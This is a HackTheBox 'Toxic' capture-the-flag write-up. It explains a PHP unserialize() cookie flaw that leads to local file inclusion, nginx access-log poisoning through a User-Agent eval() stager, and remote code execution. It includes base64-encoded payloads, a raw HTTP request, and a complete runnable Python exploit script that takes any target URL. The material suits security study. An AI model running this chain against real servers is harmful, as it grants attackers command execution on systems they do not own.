hackthebox-Toxic - writeup

Posted by admin

Toxic

index.php

// PageModel (class definition not shown on this page) includes the file named
// by its ->file property; that is how /www/index.html gets rendered.
if (empty($_COOKIE['PHPSESSID']))
{
    $page = new PageModel;
    $page->file = '/www/index.html';

    // First visit: the client is handed a serialized PageModel as its "session" cookie.
    setcookie(
        'PHPSESSID',
        base64_encode(serialize($page)),
        time()+60*60*24,
        '/'
    );
}

// Every request: the cookie is decoded and unserialized with no signature or
// type check, so the client fully controls the object and its ->file path.
$cookie = base64_decode($_COOKIE['PHPSESSID']);
unserialize($cookie);

By default the page includes /www/index.html. The PHPSESSID cookie is not a real PHP session id here: it is a base64-encoded serialized PageModel object whose file property names the file to include.

The cookie is passed straight to unserialize(), so the object, and with it the included path, is fully attacker-controlled (PHP object injection leading to local file inclusion).

Payload construction

Base64-decoding the default PHPSESSID value gives:

O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}

There is no flag.php in the web root, and the flag file in / is named "flag" followed by random letters, so a plain file read is not enough: we need code execution to list / and find the name.

Modify the payload so the included file is the nginx access log (the s:25: length must match the new path exactly, or unserialize() fails and nothing is included):

O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}

Capture a request in Burp and change the User-Agent so that it carries PHP code. The full request is below: the User-Agent holds the stager and the cookie already points at the access log. nginx appends the access-log line only after it has sent the response, so the code lands in the log on this request and is executed by the next request that includes the log.

GET / HTTP/1.1
Host: 209.97.187.76:31340
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 <?php eval($_GET['2']);?> AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQ==
Connection: close

Getting the flag

[screenshot in the original: the response shows the access log, confirming the include succeeded]

Once the stager is in the log, every request that includes it runs the PHP passed in the 2 query parameter. List / to learn the randomized flag file name, then read the file.

[screenshot in the original: flag output]
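The whole chain above, scripted as an added example (this is not the writeup's or the challenge's own code): it builds the cookie with correct s:N: byte lengths, poisons the access log through the User-Agent, then includes the log via the cookie and runs a command through the stager's 2 parameter. It assumes, as the writeup describes, that PageModel includes the path held in its file property and that nginx logs the raw User-Agent to /var/log/nginx/access.log. The names STAGER, serialize_pagemodel, build_cookie, parse_cookie, php_command, trigger_url and exploit are mine; exploit() needs a live target, everything else runs offline.

```python
#!/usr/bin/env python3
"""Toxic: PHP object injection -> LFI of the nginx access log -> log poisoning -> RCE.

Added example, not the writeup's or the challenge's own code. Assumes PageModel
includes the path stored in its 'file' property (as the writeup describes) and
that the target logs the raw User-Agent to /var/log/nginx/access.log.
"""
import base64
import re
import sys
import urllib.parse
import urllib.request

LOG_PATH = "/var/log/nginx/access.log"
# PHP dropped into the log through the User-Agent header; the query parameter
# name '2' matches the writeup's payload.
STAGER = "<?php eval($_GET['2']);?>"


def serialize_pagemodel(path: str) -> str:
    """Serialized PageModel with one public property, 'file'.

    The s:N: prefix is the byte length of the string, not its character
    count; a wrong N makes unserialize() fail and the include never happens.
    """
    n = len(path.encode())
    return f'O:9:"PageModel":1:{{s:4:"file";s:{n}:"{path}";}}'


def build_cookie(path: str) -> str:
    """PHPSESSID value that makes the app include `path`."""
    return base64.b64encode(serialize_pagemodel(path).encode()).decode()


def parse_cookie(cookie: str) -> str:
    """Inverse of build_cookie: recover the path, checking the length field."""
    raw = base64.b64decode(cookie).decode()
    m = re.fullmatch(r'O:9:"PageModel":1:\{s:4:"file";s:(\d+):"(.*)";\}', raw, re.S)
    if not m or int(m.group(1)) != len(m.group(2).encode()):
        raise ValueError("not a single-property PageModel cookie")
    return m.group(2)


def poison_user_agent() -> str:
    """Header value that lands the stager in the access log verbatim.

    The User-Agent is written to the log as sent, unlike the request path,
    which the client URL-encodes; that is why the writeup uses this header.
    """
    return f"Mozilla/5.0 {STAGER} AppleWebKit/537.36"


def php_command(cmd: str) -> str:
    """PHP snippet for the '2' parameter: run cmd via system() inside eval()."""
    quoted = cmd.replace("\\", "\\\\").replace("'", "\\'")
    return f"system('{quoted}');"


def trigger_url(base_url: str, cmd: str) -> str:
    """URL whose query string carries the PHP for the stager to eval()."""
    return base_url.rstrip("/") + "/?" + urllib.parse.urlencode({"2": php_command(cmd)})


def exploit(base_url: str, cmd: str, timeout: float = 10) -> str:
    """Two requests: poison the log, then include it and execute cmd."""
    # 1. Poison: nginx appends the log line after this response is sent, so the
    #    stager is only available to the *next* request that includes the log.
    req = urllib.request.Request(base_url.rstrip("/") + "/",
                                 headers={"User-Agent": poison_user_agent()})
    urllib.request.urlopen(req, timeout=timeout).read()

    # 2. Include the log through the cookie; eval() runs our command. A plain
    #    User-Agent here keeps this request from adding more PHP to the log.
    req = urllib.request.Request(
        trigger_url(base_url, cmd),
        headers={"User-Agent": "curl/8.0",
                 "Cookie": "PHPSESSID=" + build_cookie(LOG_PATH)},
    )
    return urllib.request.urlopen(req, timeout=timeout).read().decode(errors="replace")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://host:port 'ls /'")
    print(exploit(sys.argv[1], sys.argv[2]))
```

Run it once with `ls /` to learn the flag's randomized name, then again with `cat` on that file. The command output comes back embedded in the dumped log, so look for it between the log lines; since the stager stays in the log, every later request that includes the log re-executes whatever is in the 2 parameter.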

